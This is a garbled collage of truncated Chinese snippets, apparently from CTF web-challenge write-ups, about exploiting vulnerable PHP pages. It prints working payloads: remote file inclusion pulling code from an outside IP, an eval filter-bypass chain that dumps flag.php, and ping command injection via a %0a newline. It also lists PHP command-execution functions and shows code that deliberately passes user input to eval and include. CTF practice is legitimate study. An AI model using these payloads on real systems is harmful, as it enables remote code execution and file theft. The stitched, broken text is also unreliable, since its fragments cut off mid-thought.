eval( "var_dump($a);"); show_source(__FILE__); ?> 1. 2. 3. 4. 5. 6. 这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了eval()和@(错误控制运算符)等可能引发安全问题的函数。让我们逐一解析这段代码: include "flag.php";: 这行代码包含了名为flag.php的文件。我
>。其中 show_source是定义的一个函数,具体函数是干啥的,还是要看函数体; include...这个也是php的一个格式;接下来,就是参数的传值了,有a和b两个参数,在参数之后,就是对参数值的判断了,很明显,判断对了就会出现 flag。 在第一个if的地方,就是将a和0进行比较,返回Ture就可以了; 第二个if是一个函数 is...
file=http://1.117.144.41:8090/1.txt aeqaq=show_source('fl0g.php'); 1. 2. web81 $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); $file = str_replace(":", "???", $file); include($file); 1. 2....
?c=show_source(next(array_reverse(scandir(pos(localeconv())); 32-36 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){ eval($c);...
show_source(__FILE__);include('flag.php');$a=$_GET['cmd'];if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写,/m表示多行匹配 if(preg_match('/^php$/i', $a)){ echo 'hacker'; } else{ echo $flag; }}else{ echo 'nonononono';} 例题分析:字符...
show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写,/m表示多行匹配 if(preg_match('/^php$/i', $a)){ echo 'hacker'; } else{ echo $flag; } } else{ echo 'nonononono'; } 例题分析: 字符^ 和 $ 同时...
system() 执行命令passthru()exec()shell_exec()popen()pcntl_exec()反引号 同shell_exec()eval() 执行命令show_source() 高亮显示文件highlight_file() 高亮显示文件array_reverse() 反向输出元素pos() 输出当前元素的值localeconv() 返回一包含本地数字及货币格式信息的数组include 一般用于括号被过滤的情况,...
show_source(__FILE__); ?> 观察代码,发现主要获取的用户输入的IP参数,然后进行ping命令操作。 而且其中过滤很多管道符,不过依然可以使用%0als进行绕过。 payload: ?ip=127.0.0.1%0als 可以查看到flag.php位置,在使用cat命令读取flag.php文件内容。payload: ...
show_source(__FILE__); }else{include$_GET["action"].".php"; } 可以文件包含,但是被添加了.php后缀。尝试%00截断、超长字符串截断均不成功。 注意到第一句代码,变量名为ROBOTS,联想到robots.txt。 访问后发现目录 User-agent:*Disallow:/installDisallow:/admin ...
bugkuctf平台10个较简单的web题目writeup,适合新手入门,可以找来试试http://ctf.bugku.com/bbs 。 本地包含 题目描述: 地址:http://120.24.86.145:8003/ 这里需要我们传参hello,然后使用var_dump()函数输出 这里直接使用show_source()函数,也可以使用highlight_file()函数,显示flag.php的源码 ...